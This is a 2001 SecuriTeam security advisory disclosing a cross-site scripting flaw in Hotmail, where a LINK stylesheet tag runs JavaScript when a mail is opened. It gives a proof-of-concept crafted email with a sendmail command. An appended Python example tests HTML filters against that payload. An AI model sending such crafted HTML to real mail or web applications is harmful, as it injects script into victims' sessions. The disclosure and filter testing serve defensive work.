[NEWS] Hotmail LINK CSS Vulnerability (New Strain)

From: support@securiteam.com
Date: 08/26/01


From: support@securiteam.com
To: list@securiteam.com
Subject: [NEWS] Hotmail LINK CSS Vulnerability (New Strain)
Message-Id: <20010826061009.5D53D138BF@mail.der-keiler.de>
Date: Sun, 26 Aug 2001 08:10:09 +0200 (CEST)

The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com

  Hotmail LINK CSS Vulnerability (New Strain)
------------------------------------------------------------------------

SUMMARY

A new Cross Site Scripting (CSS) vulnerability carries with it
potentially serious security implications that go beyond the Microsoft
Hotmail system. This vulnerability, and this type of vulnerability (CSS)
in general, affects many more HTML-aware web applications.

The Cross Site Scripting vulnerability below is believed to be a new
strain of CSS. Web application developers and security engineers are urged
to check and update their current HTML filters in all HTML-aware web
applications. This includes Webmail, On-line Auctions, Message Boards,
HTML Chats, Guest Books, etc.

NOTE: Microsoft was advised of this issue Aug 21, 2001 and issued a fix by
Aug 23, 2001. Hotmail is no longer vulnerable to this problem.

DETAILS

This is a simple proof of concept that illustrates how sending a crafted
HTML email with the enclosed body will auto-execute JavaScript when the
email is read.

** NOTE: Example tested under Netscape 4.77 **

==============================================

* WebMail Example *
sendmail -t <target>@hotmail.com

MIME-Version: 1.0
From: The Attacker <foos@bar.com>
Content-Type: text/html; charset=us-ascii
Content-Transfer-Encoding: 7bit
Subject: LINK TAG JavaScript Execution Example

<HTML><BODY>

<LINK REL=STYLESHEET TYPE="text/javascript" SRC="javascript_path.js">

</BODY></HTML>

========================================
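
Added example (not part of the original advisory, and not Hotmail's filter): one way to check an HTML filter against the LINK element above, comparing a filter that strips only SCRIPT blocks with an allowlist sanitizer. The tag allowlist, the function names and the paragraph wrapped around the LINK element are assumptions made for illustration.

```python
import re
from html import escape
from html.parser import HTMLParser

# Assumed allowlist for a webmail body (illustrative, not Hotmail's real filter).
ALLOWED = {"p": (), "b": (), "i": (), "ul": (), "li": (), "a": ("href",)}
SAFE_SCHEMES = ("http://", "https://", "mailto:")
DROP_CONTENT = {"script", "style"}  # drop the element text too, not just the tags

def denylist_filter(body):  # weak pattern: strips only <script> blocks
    return re.sub(r"(?is)<script\b.*?</script\s*>", "", body)

class MailSanitizer(HTMLParser):
    def __init__(self):
        super().__init__(convert_charrefs=True)
        self.out, self.dropped, self._skip = [], [], 0

    def handle_starttag(self, tag, attrs):  # names arrive lowercased
        if tag in DROP_CONTENT:
            self._skip += 1
        if tag not in ALLOWED:
            self.dropped.append(tag)  # LINK is not allowlisted, so it is never emitted
            return
        kept = ""
        for name, value in attrs:
            value = (value or "").strip()
            # href is the only allowed attribute; keep it only with a safe scheme
            if name in ALLOWED[tag] and value.lower().startswith(SAFE_SCHEMES):
                kept += f' {name}="{escape(value, quote=True)}"'
        self.out.append(f"<{tag}{kept}>")

    def handle_endtag(self, tag):
        if tag in DROP_CONTENT:
            self._skip = max(0, self._skip - 1)
        elif tag in ALLOWED:
            self.out.append(f"</{tag}>")

    def handle_data(self, data):
        if not self._skip:
            self.out.append(escape(data))  # text is re-encoded, never copied raw

def sanitize(body):
    parser = MailSanitizer()
    parser.feed(body)
    parser.close()
    return "".join(parser.out), parser.dropped

# LINK element taken from the advisory; the paragraph around it is constructed.
SAMPLE = ('<HTML><BODY><P>Hello <B>there</B></P><LINK REL=STYLESHEET '
          'TYPE="text/javascript" SRC="javascript_path.js"></BODY></HTML>')
```

denylist_filter(SAMPLE) returns the body with the LINK element intact, while sanitize(SAMPLE) returns only the allowlisted markup together with the list of dropped tag names, which can be logged for review.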

